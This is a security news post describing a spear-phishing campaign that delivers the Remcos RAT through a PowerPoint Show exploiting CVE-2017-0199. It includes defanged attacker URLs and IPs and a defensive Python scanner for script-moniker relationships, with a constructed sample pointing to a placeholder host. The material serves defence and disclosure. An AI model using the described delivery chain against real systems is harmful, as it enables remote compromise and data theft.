New Malware Abuses PowerPoint Slide Show

In April Microsoft fixed the CVE-2017-0199 vulnerability in Office after threat actors had been exploiting it in the wild. The same vulnerability has now been found to be exploited through a specially crafted PowerPoint Show (PPSX) presentation file.

CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware. It is commonly exploited via the use of malicious Rich Text File (RTF) documents.

According to researchers at Trend Micro, who spotted the campaign, the targeted attack starts with a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider, and mainly targets companies in the electronics manufacturing industry.

Technical Analysis

The exploit arrives as a spear-phishing email attachment, purportedly from a cable manufacturing provider, that drops a remote access tool as its final payload.

Figure 2: the spear-phishing email

When the malicious PowerPoint Show is opened, it displays the text CVE-2017-8570, which is a different Microsoft Office vulnerability. However, based on our analysis, it actually exploits CVE-2017-0199. The mismatch is a leftover from the toolkit developer that the sender did not bother to change.

The file triggers a script moniker in ppt/slides/_rels/slide1[.]xml[.]rels. The exploit runs remote code fetched from hxxp://192[.]166[.]218[.]230:3550/logo[.]doc; the host is a VPN or hosting service abused by the attacker.

Figure 4: the remote malicious code

When the sample is run, PowerPoint initializes the script moniker and executes the remote malicious payload through the PowerPoint Show animations feature.

Figure 6: RATMAN.EXE

The logo.doc file is actually an XML file containing JavaScript that runs a PowerShell command to download and execute a file known as RATMAN.EXE (detected by Trend Micro as BKDR_RESCOMS.CA). The executable is a trojanized version of the REMCOS remote access tool (RAT), fetched from the Command & Control (C&C) server hxxp://192[.]166[.]218[.]230:3550/ratman[.]exe, which is located in Poland. The 192[.]166[.]218[.]230 address is also known to host other kinds of RATs. RATMAN.EXE then connects to the C&C server at 5[.]134[.]116[.]146:3550 for execution.

RATMAN.EXE is a trojanized version of the Remcos Remote Control tool which, once installed, lets attackers control infected computers remotely from its command-and-control server.

Figure 7: the Remcos RAT control panel

Remcos is a legitimate and customizable remote access tool that lets users control their systems from anywhere in the world, with capabilities such as download-and-execute commands, a keylogger, a screen logger, and recorders for both webcam and microphone.

Because the exploit has typically been delivered through infected Rich Text File (.RTF) documents, most detection methods for CVE-2017-0199 focus on RTF. Using a PPSX file instead therefore also allows attackers to evade antivirus detection.
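The two points above (the script moniker lives in a slide's relationship part, and RTF-centric signatures miss PPSX) suggest a simple file-level check that does not depend on the container format's usual signatures. The following Python script is an added example, not code from the original post or from Trend Micro: it opens a PPTX/PPSX as the ZIP package it is, parses every `*.rels` part, and flags relationships that either use a `script:` moniker target or point outside the package at a URL while not being an ordinary hyperlink relationship (hyperlinks are legitimately external, so they are excluded to avoid false positives). The sample decks, relationship types and the `placeholder.invalid` target are constructed for the demonstration and are not the campaign's files.

```python
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

# OPC relationship namespace used by every *.rels part in an Office package.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Ordinary hyperlinks are also TargetMode="External"; we do not flag those.
HYPERLINK_SUFFIX = "/hyperlink"
URL_RE = re.compile(r"^\s*(?:script:)?\s*(?:https?|ftp)://", re.IGNORECASE)


def suspicious_relationships(data: bytes):
    """Return (part_name, rel_id, target) for each relationship that looks
    like an out-of-package code reference: a 'script:' moniker target, or a
    non-hyperlink relationship whose external target is a URL.
    `data` is the raw bytes of a .pptx/.ppsx file."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if not name.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(pkg.read(name))
            except ET.ParseError:
                # A .rels part that does not parse is itself worth a look.
                findings.append((name, None, "<unparseable .rels part>"))
                continue
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "")
                external = rel.get("TargetMode", "").lower() == "external"
                is_script = target.lower().lstrip().startswith("script:")
                is_ext_url = (external and URL_RE.match(target)
                              and not rel_type.endswith(HYPERLINK_SUFFIX))
                if is_script or is_ext_url:
                    findings.append((name, rel.get("Id"), target))
    return findings


def scan_file(path: str):
    """Convenience wrapper for scanning a deck on disk."""
    with open(path, "rb") as fh:
        return suspicious_relationships(fh.read())


def build_sample_deck(rels_xml: str) -> bytes:
    """Constructed minimal package: just enough parts to exercise the scan."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")  # placeholder
        pkg.writestr("ppt/slides/slide1.xml", "<p:sld/>")
        pkg.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# Constructed benign slide: an internal layout reference plus a normal hyperlink.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="{OFFICE_REL}/hyperlink" Target="https://example.com/" TargetMode="External"/>
</Relationships>"""

# Constructed suspicious slide: same as above plus an external script-moniker
# relationship; the target host is a placeholder, not a real indicator.
SUSPICIOUS_RELS = BENIGN_RELS.replace(
    "</Relationships>",
    f'  <Relationship Id="rId3" Type="{OFFICE_REL}/oleObject" '
    'Target="script:http://placeholder.invalid/logo.doc" TargetMode="External"/>\n'
    "</Relationships>")


if __name__ == "__main__":
    decks = {"benign": build_sample_deck(BENIGN_RELS),
             "suspicious": build_sample_deck(SUSPICIOUS_RELS)}
    for label, blob in decks.items():
        print(label, suspicious_relationships(blob))
    for path in sys.argv[1:]:
        print(path, scan_file(path))
```

Run it with no arguments to see the two constructed decks triaged, or pass one or more .pptx/.ppsx paths to scan real files. The check is deliberately narrow: it looks only at relationship targets, so it complements rather than replaces signature-based scanning, and an unparseable `.rels` part is reported rather than silently skipped.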

The simplest way to protect against this attack is to download and apply the patches Microsoft released in April, which address the CVE-2017-0199 vulnerability.

Author: Cognore
